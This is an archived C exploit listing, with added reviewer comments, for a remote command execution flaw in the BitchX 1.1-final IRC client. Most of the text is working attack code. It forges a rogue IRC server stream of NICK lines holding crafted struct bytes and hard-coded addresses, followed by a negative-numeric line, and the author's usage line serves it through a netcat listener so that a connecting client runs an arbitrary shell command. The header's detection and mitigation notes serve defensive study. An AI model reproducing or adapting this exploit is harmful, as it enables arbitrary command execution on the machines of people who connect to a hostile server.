BitchX 1.1-final (EXEC) Remote Command Execution Exploit
/*
 * BitchX 1.1-final (EXEC) Remote Command Execution Exploit
 * (archived listing; page stamp: 0day.today [2024-12-24])
 *
 * Reviewer summary, taken from the code and the author's notes below:
 *   - The program only writes text to stdout. The author's usage line pipes
 *     that text into a listener standing in for an IRC server, so the party
 *     at risk is a client that connects to a server it does not control.
 *   - Seven lines are produced: a 001 welcome, five NICK changes whose
 *     "new nick" field carries raw struct bytes (32-bit address values, so
 *     non-printable bytes), and one server line whose numeric field is
 *     written with a leading '-' (see RAW_FMT_STR).
 *   - Detection: IRC numerics are three decimal digits, so a numeric token
 *     that starts with '-' is anomalous in server-to-client traffic, as is a
 *     NICK parameter containing control or high-bit bytes.
 *   - Mitigation: the author's synopsis places the root cause in an unchecked
 *     bound on a table in hook.c, so the fix belongs in the client, which
 *     must range-check the value before using it as an index. This page
 *     names no fixed version.
 *   - The three addresses below are absolute values for one specific binary
 *     build (see the author's comment above them).
 */

/* Name: PBXS - Pointless BitchX Sploit
 * Author: clarity_
 * Infected Versions: 1.1-final and others?
 * Synopsis: BitchX suffers from an unchecked bound in a hash table in hook.c where one
 * can inject data structures allowing for the remote execution of commands!
 * Usage: Execute "gcc -o pbxs pbxs.c; ./pbxs ps -aux | nc -l -p 6667" Now when the vuln bitchx
 * version connects to the mischievous server "ps -aux" will be executed.
 * Shout Outs: solomon, crypt1, vortek, ziri, and everyone else at svun @ undernet
 */

// Addresses for BitchX-1.1-final-linux.tar.gz avail on ftp.bitchx.org
#define HOOK_FUNCTIONS 0x81366e0
#define NICKNAME 0x8155353
#define STAR 0x8108f34

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

// Fixed text fragments of the emitted IRC lines.
#define NICK_STR ":bleh!i"
#define NICK_STR2 "@svun.powns.net NICK :"
#define EXEC_STR "EXEC $1-"
// The numeric field is printed with a leading '-'.
#define RAW_FMT_STR ":my_server -%u bleh :%s"

/* The three hard-coded addresses plus the values main() derives from them. */
typedef struct {
    unsigned int hook_functions, nickname, star;
    unsigned int base, diff, offset;
} Addresses;

/* Partial structs full struct w/ correct values found in include/struct.h */

// NOTE(review): in the collapsed page text the word "static" sits between each
// of the next two comments and the following "typedef". It is kept inside the
// comment here because "static typedef" is not valid C.

// To be loaded into nickname static
typedef struct {
    unsigned int name; // point to hook
    unsigned int list; // EXEC $1- 2 words
} HookFunc;

// To be loaded into joined_nick static
typedef struct {
    // unsigned int next; /* struct hook_stru *next; */
    unsigned int nick; /* char *nick; */ //star
    unsigned int stuff; /* char *stuff; */
    unsigned int shit;
} Hook;

/*
 * Build one string for the NICK sequence.
 *
 * addrs: address set filled in by main().
 * X:     number of 'X' filler bytes appended after the Hook bytes. X == 4
 *        selects the longest form, which also carries the padding, the
 *        HookFunc bytes and the EXEC string.
 * Y:     non-zero  -> return a full line ":<old nick>!i@svun.powns.net NICK :<payload>";
 *        zero      -> return only <payload>, which the recursive call uses as
 *                     the <old nick> of the next line.
 *
 * Returns a malloc'd 1024-byte buffer. The malloc result is not checked, and
 * no caller in this file frees it, including the buffer returned by the
 * recursive call.
 */
char *
make_nickname(Addresses *addrs, int X, int Y)
{
    char *tmp = NULL, *sp = NULL;
    int i;
    HookFunc h;
    Hook hk;

    // malloc
    tmp = (char *) malloc(1024);

    // BASE
    h.name = addrs->star;
    h.list = addrs->base - addrs->diff - 4;

    if (Y) {
        // start loading string
        if (X == 4) {
            // First line of the sequence: the old nick is the literal "bleh".
            strcpy(tmp, NICK_STR);
        } else {
            // Later lines: the old nick is the payload of the previous
            // (X + 1) line, so each line renames from the preceding new nick.
            strcpy(tmp, ":");
            strcat(tmp, make_nickname(addrs, X + 1, 0));
            strcat(tmp, "!i");
        }
        sp = tmp + strlen(tmp); // point to char after tmp
        //*sp++ = '0' + X;
        strcpy(sp, NICK_STR2);
    } else {
        sp = tmp;
        *tmp = '\0';
    }

    hk.nick = addrs->star;
    hk.stuff = addrs->base + 8; // "stuff" is loaded after the nick

    // load str
    sp = tmp + strlen(tmp); // point to char after tmp
    memcpy(sp, &hk, sizeof(Hook));
    // Advance past the first two fields only. The third field is never
    // assigned, and its copied bytes are overwritten by the filler below.
    sp += sizeof(Hook) - 4;

    if (X != 4) {
        while (X--) {
            *sp++ = 'X';
        }
        *sp++ = '\0';
        return tmp;
    } else {
        while (X--) {
            *sp++ = 'X';
        }
    }

    // pad
    if (sizeof(Hook) > addrs->diff) {
        // The diagnostic goes to stdout, i.e. into the generated stream itself.
        printf("!!!!!!!!!!!!!ERRRRRRRRRRRRROOOOOOOOOOOOOOOOORRRRRRRRRRRRRRRRRR: %d\n", addrs->diff);
    }
    for (i = sizeof(Hook); i < addrs->diff; ++i)
        *sp++ = 'x';

    memcpy(sp, &h, sizeof(HookFunc));
    sp += sizeof(HookFunc);
    memcpy(sp, EXEC_STR, strlen(EXEC_STR));
    // Decrements the byte at index 4 of the string just copied (the space
    // after "EXEC") by one; the page does not state the reason.
    --sp[4];
    sp += strlen(EXEC_STR);
    // Pre-increment: one byte of malloc'd memory that was never written stays
    // in the string before the terminator.
    *++sp = '\0';
    return tmp;
}

//#define RAW_FMT_STR ":my_server %d bleh :%s"
/*
 * Format the final server line: RAW_FMT_STR filled with addrs->offset and cmd.
 *
 * Returns a malloc'd 2000-byte buffer; the malloc result is not checked and
 * the caller does not free it.
 * NOTE(review): sprintf is unbounded, so a cmd longer than the space left in
 * the 2000-byte buffer overruns it (the author's own "fix later").
 */
char *
make_raw(Addresses *addrs, char *cmd)
{
    char *tmp = NULL;
    unsigned int len;

    len = 2000; // fix later
    tmp = (char *) malloc(len);
    sprintf(tmp, RAW_FMT_STR, addrs->offset, cmd);
    return tmp;
}

/*
 * Derive offset/diff/base from the hard-coded addresses and print the seven
 * lines to stdout.
 *
 * Only argv[1] is used, and it is read without checking argc.
 * The divisor 20 is presumably the size of one table entry; confirm against
 * include/struct.h, which this page does not show.
 */
int
main(int argc, char **argv)
{
    Addresses addrs;
    char *cmd = argv[1];

    addrs.hook_functions = HOOK_FUNCTIONS;
    addrs.nickname = NICKNAME;
    addrs.star = STAR;

    // Distance between the two addresses in 20-byte units, rounded up.
    addrs.offset = ((NICKNAME - HOOK_FUNCTIONS) / 20) + 1;
    // Bytes from NICKNAME up to the next 20-byte boundary counted from HOOK_FUNCTIONS.
    addrs.diff = 20 - ((NICKNAME - HOOK_FUNCTIONS) % 20);
    addrs.base = NICKNAME + addrs.diff;

    printf(":my_server 001 bleh :a\n");
    // Longest payload first, then one filler byte fewer on each following line.
    printf("%s\n", make_nickname(&addrs, 4, 1));
    printf("%s\n", make_nickname(&addrs, 3, 1));
    printf("%s\n", make_nickname(&addrs, 2, 1));
    printf("%s\n", make_nickname(&addrs, 1, 1));
    printf("%s\n", make_nickname(&addrs, 0, 1));
    printf("%s\n", make_raw(&addrs, cmd));
    return 0;
}